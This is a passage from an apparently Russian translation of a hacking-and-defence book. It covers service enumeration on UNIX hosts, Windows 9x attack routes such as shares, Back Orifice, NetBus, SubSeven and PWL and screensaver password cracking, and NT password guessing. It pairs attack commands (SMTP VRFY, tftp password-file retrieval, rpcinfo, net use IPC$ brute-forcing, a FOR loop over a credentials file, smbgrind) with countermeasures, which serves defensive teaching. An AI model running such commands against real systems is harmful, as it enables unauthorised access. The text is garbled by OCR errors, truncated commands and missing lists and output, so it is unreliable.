данные о времени, прошедшем после последнего нажатия пользователем клавиш на клавиатуре, rusers -1 192.168.202.34 Еще один классический метод инвентаризации основан на использовании универсального средства почтовой доставки Internet — протокола SMTP (Simple Mail Transfer Protocol). Этот протокол поддерживает две встроенные команды, которые позволяют выполнять инвентаризацию пользовательских учетных записей. Команда VRFY подтверждает, что введенное имя имеется в системе, а команда EXPN отображает реальный адрес доставки письма вместо псевдонима или списка рассылки. Хотя в настоящее время многие компании и так достаточно свободно предоставляют информацию об электронных адресах, разрешение подобной деятельности на почтовом сервере может дать взломщику ценную информацию о пользователях, а также предоставить ему возможность фальсификации. telnet 192.168.202.34 25 Это еще один пример того, что нужно всегда помнить о старых хакерских приемах и вовремя отключать соответствующие режимы. Популярная программа sendmail, предназначенная для обмена информацией с использованием протокола SMTP (http://www.sendmail.org), начиная с версии 8, поддерживает синтаксис, который позволяет поместить в файл mail.cf параметры, запрещающие подобные команды или требующие аутентификации. Другие реализации SMTP-сервера должны предоставлять аналогичные возможности. Если это не так, замените программу! tftp 192.168.202.34 Помимо того, что в данном примере взломщику удалось получить файл паролей, которые он может попытаться взломать в любой момент, прямо из этого файла он может получить информацию о пользователях. Решение данной проблемы состоит в том, чтобы вообще отказаться от протокола TFTP. В тех же случаях, когда это действительно необходимо, упаковывайте передаваемые по этому протоколу пакеты данных, ограничьте доступ к каталогу /tftpboot и убедитесь, что протокол заблокирован на уровне пограничного брандмауэра. Инвентаризация приложений и идентификационных маркеров Как и любой другой сетевой ресурс, приложения должны иметь возможность обмениваться друг с другом информацией по сети. Одним из самых популярных протоколов, разработанных для обеспечения этого процесса, является протокол RPC (Remote Procedure Call). На основе RPC работает программа rpcbind, основная задача которой состоит в посредничестве между запросами клиентов и портами, которые эта программа динамически назначает находящимся в режиме ожидания приложениям. Несмотря на постоянную головную боль, которую много лет вызывают у администраторов брандмауэров подобные программы, служба RPC остается чрезвычайно популярным механизмом. Существует утилита rpcinfo, которая, подобно программе finger, может применяться для инвентаризации приложений RPC, находящихся в состоянии ожидания запроса на удаленном узле. Обычно для того чтобы воспользоваться этой утилитой, во время сканирования достаточно установить, что открыт порт 111 (rcbind) или 32771 (вариант утилиты от компании Sun). rpcinfo -p 192.168.202.34 Из полученных результатов можно заключить, что на данном узле запущен системный процесс rusersd, программное обеспечение служб NFS и NIS (ypserv — сервер службы NIS). Таким образом, с помощью команд rusers, shomount -e и pscan -n можно попытаться получить более подробную информацию. Кроме того, для инвентаризации можно также воспользоваться утилитой pscan (упоминавшейся выше) с параметром -г. D:\Toolbox>rpcdump 192.168.202.105 Существует и несколько других приемов использования службы RPC, с помощью которых хакеры могут получать требуемую информацию. Так, в системе Solaris компании Sun используется вторая утилита, необходимая для работы с портами с номерами выше 32771. Следовательно, модифицированная версия утилиты rpcinfo при обращении к этому порту позволит получить приведенную выше информацию, даже если порт 111 заблокирован. nc -nw -о banners.txt
Если в качестве параметра утилиты netcat используется IP-адрес исследуемого компьютера, то нужно указать также параметр -n. Контрмеры против сбора идентификационных маркеров Конечно, мы коснулись лишь нескольких из самых популярных приложений, поскольку ограничения по времени и объему не позволяют нам подробнее рассмотреть все многообразие существующего сетевого программного обеспечения. Однако, отталкиваясь от описанных в данном разделе общих подходов, необходимо по крайней мере "заткнуть рот" слишком "болтливым" приложениям вашей сети. Дополнительные сведения об устранении имеющихся изъянов можно поискать на Web-узле канадской консультационной компании PGCI. специализирующейся в области защиты информации, по адресу http://www.pgci.ca/p_fingerprint.html. Помимо интересной дискуссии о защите от попыток выявления типа и версии операционной системы (см. главу 2), на этом Web-узле приведены сведения о контрмерах, позволяющих предотвратить инвентаризацию идентификационных маркеров с помощью таких средств как программы sendmail, telnet, и протокол FTP. Там же вы найдете список адресов других Web-серверов, на которых содержится аналогичная информация. |
Резюме Если не считать времени, информация — это наиболее мощное оружие, которое может попасть в распоряжение хакера. К счастью, эта же информация может пригодиться и при обеспечении безопасности. В этой главе вы познакомились с несколькими источниками утечки информации, используемыми хакерами, а также узнали о некоторых способах устранения подобных проблем, вкратце перечисленных ниже.
|
Глава 4. УЯЗВИМОСТЬ WINDOWS 95/98/ME
|
Уязвимость WINDOWS 95/98/ME Самое важное, что должен знать администратор сети или конечный пользователь Windows 95/95B/98/98SE (далее — Win 9х), — это то, что при проектировании данной операционной системы вопросам безопасности не уделялось большое внимание, в отличие от ее "двоюродной сестры" Windows NT/2000. По существу складывается впечатление, что при планировании архитектуры Win 9x компания Microsoft везде, где только было можно, пожертвовала безопасностью в угоду простоте использования. Win 9x по праву считается системой, предназначенной для конечного пользователя. Зачастую самый простой способ проникновения в такую систему заключается в анализе данных Web или почтовых сообщений, передаваемых пользователю, а не в использовании средств самой операционной системы. В связи с этим мы настоятельно рекомендуем познакомиться с главой 16. |
Удаленное проникновение Методы удаленного проникновения в систему Win 9x условно можно разделить на четыре категории: прямое подключение к совместно используемому ресурсу (в том числе и ресурсам удаленного доступа); установка фонового сервера, предназначенного для создания "потайного хода''; использование известных изъянов приложений; генерация условия DoS (denial of service — отказ в обслуживании). Необходимо отметить, :о для реализации трех из перечисленных методов требуется, чтобы либо система была настроена неправильно, либо ее пользователь не имел практически никаких навыков администрирования. Ввиду того что такие ситуации случаются крайне редко, противостоять попыткам удаленного проникновения в общем случае довольно легко. |
Прямое подключение к совместно используемым ресурсам Win 9x Этот метод проникновения в удаленную систему Win 9x является самым очевидным и легко осуществимым. Win 9x поддерживает три способа получения прямого доступа к системе: путем подключения к совместно используемым файлам и принтерам; через компонент сервера удаленного доступа (по умолчанию не устанавливается); посредством удаленного манипулирования системным реестром. Последний способ требует специальной настройки и знания системы зашиты на уровне пользователей, т то за пределами корпоративных сетей случается крайне редко. Хзкинг совместно используемых файлов и принтеров Win 9x Мы не знаем ни одного метода, с помощью которого можно было бы извлечь хоть какую-то пользу от доступа к совместно используемому принтеру Win 9x, поэтому посвятим оставшуюся часть раздела исключительно проблеме доступа к совместно 'используемым файлам Win 9x.
Вред, который может нанести злоумышленник, получивший таким образом доступ к системе, зависит от каталога, к которому он подключился. Если в этом каталоге находятся файлы, критичные для безопасности, или же если данный ресурс представляет собой целый раздел жесткого диска (чем нередко грешат пользователи), то последствия могут оказаться поистине разрушительными. Взломщик может просто поместить выполняемый файл в каталог %systemroot%\Start Menu\Programs\Startup, и при последующей перезагрузке компьютера данная программа будет автоматически запущена без ведома пользователя. (Примеры программ, которые могут быть внедрены в систему таким образом, приведены в следующем разделе этой главы, посвященном одной из таких программ — Back Orifice). Наконец, в распоряжении хакера может оказаться файл PWL (об этом мы поговорим несколько позже). Контрмеры: защита от хакинга совместно используемых файлов Защититься от подобного нападения очень легко. Достаточно просто-напросто отключить режим совместного использования файлов на компьютере с Win 9x! Системным администраторам, в ведении которых находится много компьютеров, мы советуем использовать редактор системной политики (System Policy Editor) POLEDIT. EXE, с помощью которого можно запретить совместный доступ к файлам и принтерам на всех компьютерах сети. Программа POLEDIT . EXE, окно которой вы видите на рис. 4.2, входит в состав комплекта Windows 9x Resource Kit (далее — Win 9x RK). Найти ее можно в каталоге \tools\reskit\netadmin установочных компакт-дисков системы Win9x .
Повторное использование данных . аутентификации Win 9x 5 января 1999 года группа исследования вопросов безопасности, известная под названием LOpht, обнародовала документ, содержащий информацию о выявленном ею изъяне в процедуре сетевой аутентификации, выполняемой при предоставлении доступа к совместно используемым файловым ресурсам. Тестируя очередную версию своего печально известного средства LOphtcrack. предназначенного для взлома и скрытного хищения паролей (см. главу 5). было установлено, что система Win 9x, на которой установлен режим совместного использования файлов и принтеров, каждые 15 минут обращается к удаленному компьютеру за подтверждением соединения. Поскольку система Windows в этом запросе использует комбинацию хэш-кода пароля и имени удаленного пользователя, а также учитывая, что имя пользователя передается в виде незакодированного текста, взломщик может просто переслать перехваченный им запрос на аутентификацию и успешно подключиться к совместно используемому ресурсу системы Win 9x. Если все это произойдет в течение 15 минут, хэшировпнный пароль будет идентичным. Хакинг сервера удаленного доступа Win 9x Показанный на рис. 4.4 компонент Windows Dial-Up Server, входящий в состав Win 9x, — это еще одна "приятная неожиданность" для системного администратора. Любой пользователь, установив пакет Microsoft Plus! for Windows 95 и подключив модем, может создать брешь в системе защиты корпоративной сети (пакет Microsoft Plus! входит в стандартный комплект поставки Win 98).
Контрмеры: защита от хакинга через удаленные соединения Совсем не удивительно, что рекомендации остаются прежними. Во-первых, сами не используйте сервер удаленного доступа Win 9х а во-вторых, с помощью редактора системной политики запретите его устанавливать и пользователям. Если же удаленный доступ все-таки очень необходим, обязательно устанавливайте пароль для входящих подключений и обеспечьте его шифрование. (Такой режим можно установить в диалоговом окне Server Туре, которое открывается после щелчка на одноименной кнопке диалогового окна свойств Dial-Up Server). Можно также перейти к аутентификации на уровне пользователя, т.е. выполнять аутентификацию с помощью сервера безопасности, такого как контроллер домена Windows NT или сервер NetWare. Установите пароль для доступа к каждому совместно используемому ресурсу (причем чем сложнее пароль, тем лучше), а также сделайте эти ресурсы скрытыми, добавив к их именам символ $. Удаленный хакинг системного реестра Win 9x В отличие от Windows NT, система Win 9x не содержит встроенных средств поддержки удаленного доступа к системному реестру. Однако если установлен компонент Remote Registry Service (RRS), который можно найти на установочном компакт-диске Windows 9х в каталоге \admin\nettools\remotreg. то это становится вполне возможным. Для работы службы RRS необходимо переключиться в режим защиты на уровне пользователей. Следовательно, для получения доступа потребуется вести правильное имя пользователя. Если взломщику повезет и ему попадется система с установленным компонентом RRS и совместно используемым каталогом, доступным для записи, а также если ему удастся узнать какое-нибудь имя пользователя и подобрать соответствующий пароль, то в результате он сможет сделать с такой системой все, что только пожелает. Легко ли отвести от себя такую угрозу? Нам кажется, что да. Более того, чтобы ее создать, надо немало потрудиться. Если вы хотите установить службу RRS, обязательно выберите хороший пароль, и этого будет достаточно. В противном случае не устанавливайте этот компонент вообще и спите спокойно, зная, что все попытки получить доступ к реестру закончатся ничем. |
"Потайные ходы" и программы типа "троянский конь" в Win 9x Если предположить, что в вашей системе Win Эх не используется совместный доступ к файлам, не установлен сервер удаленного доступа и отсутствует поддержка удаленного доступа к системному реестру, то можно ли считать ваш компьютер защищенным? По-видимому, в настоящий момент на этот риторический вопрос можно дать отрицательный ответ. Если злоумышленникам не хватает средств удаленного администрирования, они просто пытаются их установить. Back Orifice Программа Back Orifice (ВО), фактически являясь одной из самых известных программ хакинга Win 9x, анонсирована разработчиками как средство удаленного администрирования системы Win 9x. Эта программа была выпущена летом 1998 года в соответствии с соглашениями по безопасности Black Hat (http: //www.blackhat.com/), и ее по-прежнему можно свободно получить по адресу (http: //www.cultdeadcow.com/tools). Back Orifice позволяет получить практически полный удаленный контроль над системой Win 9x, включая возможность добавления и удаления ключей системного реестра, перезагрузки системы, отправки и получения файлов, просмотра кэшированных паролей, порождения процессов и создания совместно используемых файловых ресурсов. Кроме того, другими хакерами для исходного сервера ВО были написаны подключаемые модули, предназначенные для установления связи с определенными каналами IRC (Internet Relay Chat), такими, например, как #BO_OWNED, и последующего разглашения IP-адреса жертвы всем, кто интересуется подобными вещами.
У клиента ВО2К имеется одна особенность, которая плохо документирована. Она заключается в том, что иногда в поле Server Address необходимо указывать номер порта (например, 192.168.2.78:54321, а не просто IP-адрес или имя DNS).
NetBus Более требовательному хакеру, возможно, больше понравится "дальняя кузина" ВО — программа NetBus, позволяющая получить удаленное управление над системой Windows (в том числе и Windows NT/2000). Эта программа, написанная Карлом-Фредериком Нейктером (Carl-Fredrik Neikter), имеет более привлекательный и понятный интерфейс, а также более эффективный набор функций. В частности, она оснащена графическим интерфейсом, с помощью которого можно осуществлять удаленное управление (правда, только для высокопроизводительных соединений). Программа NetBus тоже позволяет гибко настраивать параметры. Кроме того, в Internet можно найти несколько ее модификаций. Сервер, запускаемый по умолчанию, имеет имя patch.exe (хотя его можно заменить на любое другое). Обычно при установке в ключ системного реестра HKEY_LOCAL_MACHINEXSoftware\ Microsoft\Windows\CurrentVersion\Run добавляется соответствующий параметр, чтобы сервер запускался каждый раз при загрузке компьютера. SubSeven Судя по всему, сервер SubSeven по популярности превосходит программы ВО, ВО2К и NetBus вместе взятые. Он определенно более стабильный, простой в использовании и предоставляет гораздо более широкие возможности хакерам. Эту программу МОЖНО найти ПО адресу http://subseveri.slak.org/main.html.
Сервер предоставляет также возможность использования канала IRC, что позволяет взломщику задать IRC-сервер и канал, к которому нужно подключиться. После этого сервер S7S передает данные о своем местоположении (IP-адрес, связанный с ним порт и пароль). Кроме того, S7S может функционировать в качестве стандартного IRC-сервера, передавать через канал команды, уведомлять взломщика об успешном поиске ценной информации через службу ICQ, почтовые службы, а также выполнять множество других действий.
Контрмеры: ликвидация "потайных ходов" и удаление "троянских коней" Все приложения-серверы, создающие "потайные ходы", должны выполняться на целевом компьютере. Их нельзя запустить удаленно (конечно, если ранее удаленная система не стала "собственностью" хакера). Обычно это можно осуществить, воспользовавшись распространенными ошибками клиентов Internet и/или элементарным обманом. Возможно, взломщики применят оба подхода. Эти методы, а также возможные контрмеры, более подробно рассматриваются в главе 16. Здесь же стоит сказать лишь следующее: постоянно выполняйте обновление используемого клиентского программного обеспечения, предназначенного для работы в Internet, и тщательно осуществляйте его настройку. |
Известные изъяны серверных приложений ВО — это не единственный пример программы, которая делает узел уязвимым перед вторжением извне. Существует немало как некоммерческих, так и коммерческих программ, которые, пусть и непреднамеренно, но все же фактически делают то же самое. Пожалуй, невозможно перечислить все программы для Win 9x, угрожающие в той или иной степени безопасности, однако имеется одно универсачьное средство: не запускайте серверные приложения под Win 9x, если вы не уверены в их безопасности. Одним из ярких примеров такой популярной, но обладающей очень большим потенциалом с точки зрения проникновения в систему, является Personal Web Server компании Microsoft. Его необновленные версии могут предоставлять содержимое файлов взломщикам, которые знают их расположение на диске и используют в запросах нестандартные URL (более подробную информацию об этом можно получить по адресу http://www.miсгosoft.com/security/bulletins/ms99-010.asp). |
Отказ в обслуживании DoS Вмешательство в работу, приводящее к отказу системы от обслуживания (Denial of Service) поступающих к ней запросов, — это последнее прибежище для извращенного ума. К сожалению, людей с таким типом мышления в Internet предостаточно. Имеется много программ, обладающих возможностью отправки сетевых пакетов с "патологической" структурой, предназначенных для аварийного завершения работы Win 9x Обычно такие программы имеют названия типа ping of death, teardrop, land, WinNuke и т.п. Подробнее об отказе в обслуживании мы будем говорить в главе 12, а сейчас лишь отметим, что для системы Win 9x существует одно универсальное средство защиты: модуль обновления Dial-Up Networking Update 1.3 (DUN 1.3). Контрмеры В состав DUN 1.3 входит обновленная библиотека Win 95 Windows Sockets (Winsock), в которой реализованы основные процедуры обработки многих потенциальных проблем TCP/IP, используемых при нападении с целью генерации условия DoS. Пользователям Win 98 не нужно устанавливать это обновление, за исключением, пожалуй, лишь жителей Северной Америки, которые хотят обновить используемые по умолчанию в Windows 98 средства шифрования с 40-битовыми ключами на их более надежную 128-битовую версию. Пакет обновления DUN 1.3 для Win 95 можно найти по адресу http://www.microsoft.com/windows95/downloads/. Программные брандмауэры И в заключение рассмотрения методов удаленного проникновения мы настоятельно рекомендуем приобрести какой-нибудь программный брандмауэр из числа имеющихся на современном рынке программного обеспечения. Эти программы будут выступать буфером между компьютером и сетью, что позволит заблокировать все попытки несанкционированных действий. Нам больше всего нравится пакет BlackICE Defender, который распространяется компанией Network ICE (http://www.networkice.com) по цене $39.95. К другим программным продуктам, популярность которых быстро возрастает, можно отнести ZoneAlarm (бесплатно распространяемый компанией Zone Labs для личного использования, http://www.zonelabs.com/) и бесплатно распространяемый пакет eSafe Desktop компании Aladdin (http://www.ealaddin.com/esafe/desktop/detailed.asp). Для того чтобы избежать головной боли в дальнейшем, приобретите такое средство и обеспечьте его функционирование в наиболее напряженном режиме. |
Непосредственное проникновение Как нам кажется, в предыдущем разделе мы довольно убедительно показали, что для того, чтобы сделать систему Win 9x доступной для удаленного проникновения, пользователю нужно так или иначе потрудиться. К сожалению, в том случае, когда злоумышленник имеет физический доступ к системе, картина меняется на противоположную: теперь пользователю нужно потрудиться, чтобы сделать систему по-настоящему недоступной. В большинстве случаев, располагая достаточным запасом времени и пользуясь отсутствием должного контроля, а также наличием свободного черного хода, злоумышленники рассматривают физический доступ как возможность простого хищения компьютера. Однако в данном разделе мы не будем рассматривать угрозы, связанные с массовыми хищениями самих компьютеров, а сосредоточимся на некоторых скрытых (а также явных) методах, позволяющих похитить критическую информацию, содержащуюся на компьютере с системой Win 9x Обход средств защиты Win 9x: перезагрузка! В отличие от Windows NT в системе Win 9x не используется концепция безопасного многопользовательского доступа к консоли. Таким образом, любому, кто имеет возможность приблизиться к системе с Win 9x на расстояние вытянутой руки, для получения доступа нужно просто включить компьютер либо выполнить "жесткую" перезагрузку (hard reboot), если он заблокирован с помощью экранной заставки (screen saver). Ранние версии Win 95 позволяли обходить заставку даже с помощью комбинаций клавиш <Ctrl+Alt+Del> или <Alt+Tab>! Все приглашения на ввод пароля, которые появляются при начальной загрузке, — не более чем косметические меры. Пароль Windows нужен лишь для активизации того или иного пользовательского профиля и не обеспечивает защиту каких-либо ресурсов (кроме самого списка паролей, о чем говорится ниже в этой главе). Для обхода приглашения на ввод пароля достаточно щелкнуть на кнопке Cancel, после чего продолжится нормальная загрузка системы. После ее завершения доступ к системным ресурсам будет практически полным. То же самое относится и ко всем диалоговым окнам сетевой регистрации (их вид может зависеть от того, к какому типу сети подключена система, но суть от этого не меняется). Контрмеры: защита консоли Одним из традиционных методов решения этой проблемы является установка пароля, хранящегося в BIOS. BIOS (Basic Input Output System) — это система низкоуровневых процедур, код которых хранится в специальной микросхеме, которая устанавливается на системной плате и обеспечивает начальную инициализацию оборудования совместимых с IBM PC компьютеров и загрузку операционной системы. Таким образом, система BIOS первой получает доступ к ресурсам, поэтому практически все разработчики BIOS предоставляют возможность защиты доступа к компьютеру с помощью пароля, что может остановить не очень искушенного злоумышленника. Профессионалы, конечно, могут просто извлечь из компьютера жесткий диск и подключить его к другому компьютеру без пароля BIOS или же воспользоваться одним из многочисленных средств взлома пароля BIOS, которые можно найти в Internet. Автозапуск и взлом пароля экранной заставки Перезапуск компьютера с помощью кнопки Reset системного блока или с помощью комбинации клавиш <Ctrl+Alt+Del> — это слишком примитивно для взломщика-эстета (или же слишком осторожного системного администратора, забывшего пароль экранной заставки). К удовольствию столь ранимых натур, существует более красивый способ обхода защиты системы Win 9x, в которой установлен пароль экранной заставки. Он базируется на двух недостатках системы безопасности Win 9x — режиме автоматического распознавания компакт-дисков и примитивном алгоритме шифрования пароля в системном реестре. С: \TEMP>95sscrk
Контрмеры: защита экранной заставки Win 9х Компания Microsoft разработала модуль обновления, который обеспечивает гораздо более высокий уровень зашиты пароля экранной заставки, под названием Windows NT/2000. Однако для упрямых приверженцев Win9x, которые могут согласиться лишь на отключение режима автоматического распознавания компакт-дисков, приведем выдержку из статьи Q126025 базы знаний Microsoft Knowledge Base. Обнаружение паролей Win 9x в памяти Если после обхода экранной заставки у злоумышленника еще остался некоторый запас времени, он может воспользоваться средствами обнаружения и получить другие системные пароли, которые в соответствующих строках диалоговых окон представляются символами "*". Такие средства скорее можно отнести к утилитам, которые могут помочь забывчивым пользователям, чем к инструментам взломщика, однако они настолько хороши, что нельзя их не упомянуть и в данной книге.
Взлом файлов . PWL Злоумышленнику вовсе не обязательно получить доступ к компьютеру на несколько часов —- он может за пару минут переписать нужные ему файлы на дискету, а затем расшифровать их в свободное время, как это обычно и делается при использовании "классических" утилит взлома паролей, таких как crack для UNIX или LOphtcrack для Windows NT.
До появления версии OSR2 в системе Windows 95 применялся очень простой алгоритм шифрования PWL-файлов, который можно было взломать с помощью широко распространенных средств без особых усилий. OSR2 (OEM System Release 2) — это промежуточная версия Windows 95, которая не продавалась в розничной сети, а устанавливалась производителями аппаратных средств (OEM — Original Equipment Manufacturer). В настоящее время при шифровании РWL-файлов используется более надежный алгоритм, однако он по-прежнему основывается лишь на данных учетной записи пользователя Windows. Это означает, что время, необходимое на подбор пароля, возросло, но сама задача взлома пароля осталась по-прежнему вполне выполнимой.
Еще одним хорошим средством для взлома РWL-файлов является CAIN от Break-Dance (http://www.confine.com). Эта утилита позволяет также получить из системного реестра пароль экранной заставки, выполнить инвентаризацию локальных совместно используемых ресурсов, кэшированных паролей и другой системной информации. Контрмеры: защита PWL-файлов Для тех администраторов, которых действительно беспокоит данная проблема. можно посоветовать воспользоваться редактором системной политики Win 9x и запретить кэширование паролей. Эту задачу можно решить и другим способом, создав (при необходимости) и установив следующий параметр системного реестра. PWL-файлы -- это далеко не единственная жертва программистов-взломщиков. Например, на Web-узле, расположенном по адресу http: //www. lostpasswcrc..com. содержится перечень утилит, предназначенных для взлома практически любых паролей, начиная от FST-файлов Microsoft Outlook и заканчивая файлами Microsoft Word. Excel и PowerPoint (так и хочется спросить: "Что вы хотите взломать сегодня?"). Имеется также несколько программ для взлома ZIP-файлов, в которых многие пользователи пересылают важную информацию, надеясь на защиту таких архивов с помощью пароля. Например, утилита Advanced Zip Password Recovery (AZPR) компании Elcomsoft позволяет выполнить взлом с помошью словаря или посредством перебора всех возможных вариантов. Кроме того, она является чрезвычайно быстрой Т >к, и >. приведенного ниже рисунка видно, что в процессе одного сеанса работы за одну секунду в среднем осуществлялась проверка.518783 паролей. |
Windows Millenium Edition (ME) Компания" Microsoft выпустила свою новую операционную систему Windows Millenium Edition (ME). Она является прямой наследницей Win 9.x и с этой точки зрения не содержит никаких серьезных изменений в области обеспечения безопасности по сравнению с более ранними версиями. Другими словами, если вы всерьез обеспокоены вопросами обеспечения безопасности, то лучше перейти к другой версии — Windows 2000. Win ME продолжает традиции своих предшественниц и предоставляет минимальные возможности защиты, чтобы повысить совместимость оборудования и простоту использования системы. С точки зрения обеспечения безопасности эта операционная система очень похожа на Win 9.x. Следовательно, нет никаких причин подробно рассматривать Win ME. |
Резюме Время идет вперед, и Win 9х становится все менее и менее интересной в качестве потенциальной жертвы. Взломщиков все больше интересуют более новые операционные системы, такие как Windows 2000. Для тех, кто остался приверженцем Win 9x, следует принять во внимание следующее.
|
Глава 5. УЯЗВИМОСТЬ WINDOWS NT
|
Уязвимость WINDOWS NT Согласно маркетинговым данным, операционная система компании Microsoft Windows NT занимает значительную долю рынка сетевых операционных систем как в государственном, так и в частном секторе экономики. При этом Windows NT стала "мальчиком для битья" в хакерской среде. Что послужило причиной, то ли ее широкая распространенность, то ли раздражение от маркетинговой политики Microsoft, то ли стойкая нелюбовь в профессиональной среде к ее простому в использовании графическому интерфейсу, который воспринимается как профанация самого понятия сетевой операционной системы, сказать трудно, однако факт остается фактом. Впервые о проблемах безопасности в NT заговорили в начале 1997 года после опубликования хакером Хоббитом (Hobbit) из группы Avian Research статьи о двух фундаментальных архитектурных решениях Windows NT — Common Internet File System (CIFS) и Server Message Block (SMB). (Co статьей можно ознакомиться по адресу http://www.insecure.org/stf/cifs.txt.) С тех пор работа над выискиванием методов проникновения в систему NT не прекращается ни на один день.
Итак, если все это правда, тогда почему мы не утверждаем, что NT безопасна на все 100%? На то есть две причины: поддержка старых программ (так называемая совместимость сверху вниз) и простота использования. Как мы покажем ниже в этой главе, приверженность к старым клиентским программам может сделать NT менее безопасной, чем она могла бы быть. Два основных примера — это обеспечиваемая в NT поддержка сетевых протоколов NetBIOS, CIFS и SMB, а также старый алгоритм шифрования пользовательских паролей, доставшийся NT в наследство от Lan Manager. Именно благодаря этим нюансам задача хакера по инвентаризации системной информации NT и расшифровке файлов с паролями является более легкой, чем она могла бы быть. |
Введение При изложении материала данной главы мы будем считать, что большая часть подготовительной работы для проникновения в систему NT уже проделана: цель выбрана (глава 2), а ее ресурсы инвентаризованы (глава 3). Как уже упоминалось в главе 2, если при сканировании оказалось, что порты 135 и 139 находятся в состоянии ожидания запросов, значит, данный узел, по-видимому, работает под управлением системы Windows NT (если обнаружен только порт 139, то это может быть и Windows 9x). Более полная информация о системе Windows NT может быть получена при сборе идентификационных маркеров. Как вы увидите в главе 6, наличие открытого порта 445 также является признаком системы Win 2000. После того как выбранная цель однозначно идентифицирована как компьютер под управлением Windows NT, начинается процесс инвентаризации ее ресурсов. В главе 3 подробно описаны средства, использующие анонимные соединения, посредством которых можно извлечь информацию о пользователях, группах и службах, работающих на целевом компьютере. При инвентаризации обычно выявляется столько информации, что зачастую бывает трудно провести грань между тем, где заканчивается инвентаризация и где начинается проникновение. Как правило, попытки взлома пароля следуют сразу же за выявленным именем пользовательской учетной записи. Анализируя данные, полученные с помощью методов инвентаризации, о которых мы говорили в главе 3, взломщик обычно всегда находит какие-то "зацепки" для выбора точки проникновения. |
На каком свете мы находимся Следуя классической модели проникновения, на которой построена эта книга, мы посвятили данную главу описанию оставшихся действий типичного хакера, пытающегося проникнуть в систему Windows NT: получение привилегий суперпользователя, расширение полномочий и сокрытие следов проникновения. Пожалуй, наиболее опасными методологиями проникновения в систему Windows, не рассмотренными в данной главе, являются приемы хакинга в Web. Средства защиты на уровне операционной системы зачастую оказываются бесполезными при предотвращении подобных атак на уровне приложений. Некоторые из наиболее разрушительных атак на систему NT за последние несколько лет базировались на использовании таких средств, как компонентов MDAC, и были направлены против встроенного в NT/2000 Web-сервера — Internet Information Server (US). Эти средства проникновения рассматриваются в главе 15. |
Windows 2000 Система NT находится не на самом верху иерархии операционных систем компании Microsoft. Выпушенная в начале 2000 года, система Windows 2000 является самой последней и мощной версией NT. |
Administrator: в поисках сокровищ Правило № 1, о котором нельзя никогда забывать при обеспечении безопасности Windows NT, состоит в том, что любой нарушитель абсолютно беспомощен, если он не обладает нравами администратора. Как мы увидим из дальнейшего обсуждения. NT не поддерживает (по умолчанию) удаленного выполнения команд, а если и позволяет это делать, то интерактивно зарегистрироваться могут лишь пользователи из группы администраторов. Это существенно сужает возможности удаленных пользователей по нанесению ущерба. Поэтому взломщики, как голодные акулы, рыщущие в океанской пучине в поисках жертвы, прилагают все усилия, чтобы выявить учетные записи пользователей, обладающих правами администратора. Именно поэтому мы начнем с рассмотрения деталей основного механизма получения привилегий администратора — подбора пароля. Удаленный подбор пароля Если на удаленном компьютере запушена служба NetBIOS, с которой связан TCP-порт 139, то самым эффективным методом проникновения в систему NT является удаленное подключение к выявленному ранее совместно используемому ресурсу и подбор пар регистрационное имя/пароль до тех пор, пока одна из них не окажется правильной. Подбор пароля можно также выполнить из командной строки с помощью команды net use. Если вместо пароля в качестве ее параметра указать символ *, то удаленный компьютер попросит ввести пароль, как показано в следующем примере. С:\> net use \\192.168.202.44\IPC$ * /user:Administrator Учетная запись, заданная с помощью ключа /и:, выглядит несколько странно. Напомним, что в NT/2000 учетные записи идентифицируются с использованием идентификаторов защиты SID, состоящих из кортежей компьютер\учетная запись или домен\учетная запись. Если зарегистрироваться в качестве администратора не удалось, попробуйте воспользоваться синтаксисом домен\учетная запись. Взломщики, как правило, пытаются подбирать пароли для ставших им известными локальных учетных записей отдельных компьютеров с NT Server или Workstation, а не для глобальных учетных записей, позволяющих получить доступ к контроллеру домена NT. В этом нет ничего удивительного, поскольку очень высока вероятность того, что локальные учетные записи контролируются не так строго, как на уровне всей организации (в этом случае все попытки подбора пароля могут также регистрироваться на контроллере домена). Кроме того, система NT Workstation позволяет любому пользователю регистрироваться в сети после регистрации на самом компьютере (т.е. пользователь Everyone может начать сеанс работы, не входя в сеть (Log on locally), а затем при необходимости подключиться к сети), что значительно упрощает удаленное выполнение команд. Если вы собираетесь использовать описываемые приемы для проверки компьютеров в сети вашей компании (конечно, с ведома начальства), не забывайте о блокировании учетных записей, которое может произойти при попытках как ручного, так и автоматизированного подбора паролей. В результате можно настроить против себя не только пользователей всей компании, которые не смогут в течение определенного времени получить доступ к своим компьютерам, но и руководство, которое вряд ли после такого инцидента будет поощрять ваши инициативы в области безопасности. Метод подбора наиболее эффективен для выявления паролей, заданных с ошибками, характерными для большинства пользователей. К таким ошибкам можно отнести следующие.
Некоторые примеры стандартных пар "имя пользователя/пароль" представлены в табл. 5.1. Мы называем такие пары наиболее вероятными комбинациями. Кроме того, достаточно большой список паролей, используемых по умолчанию, можно найти по адресу http://www.securityparadigm.соm/defaultpw.htm. Таблица 5.1. Наиболee вероятные комбинации "имя пользователя/пароль"
Хорошо продуманная стратегия подбора паролей, учитывающая все приведенные выше рекомендации, дает на удивление высокий процент успеха. Однако техника, которая хороша для хакера, подбирающего пароль ради развлечения, вряд ли заинтересует вечно занятого администратора сети, у которого и так хватает забот, чтобы заниматься ручным подбором паролей с целью контроля. [file: credentials.txt] Теперь этот файл можно подать на вход команде FOR следующим образом: C:\>FOR /F "tokens=l,2*" %i in(credentials.txt)do net use Эта команда построчно анализирует файл credentials. txt, выбирает первые две лексемы из каждой строки, а затем использует первую из них в качестве переменной «i (пароль), а вторую — как переменную %i (имя пользователя) при установке соединения с помощью команды net use с совместно используемым ресурсом IРС$ целевого компьютера. Для получения более подробной информации о команде FOR введите в командной проке FOR /?. Эта команда для хакеров NT является одной из наиболее полезных. D:\>FOR /L %i IN (1,1,254) DO nat -u Еще одним хорошим инструментом обнаружения паролей является утилита NTInfoScan (NT'S) Дэвида Литчфилда (David Litchfield), который известен также под псевдонимом Mnemonix. Эту утилиту можно найти по адресу http://packetstorm.stcurify.com/NT/audit/. NTIS — это простая утилита командной строки, которая выполняет проверку по протоколам Internet и NetBIOS, а результат выводит в файл HTML-формат. Она также осуществляет все необходимые операции по инвентаризации пользователи ;г в конце отчета помещает учетные записи с пустым паролем. В настоящее время утилита NTFS обновлена и распространяется новой компанией Дэвида, Cerberus Information Security. Теперь эта утилита называется Cerberus Internet Scanner (CIS) и снабжена графическим интерфейсом. D:\> smbgrind -I 100 -i 192.168.2.5
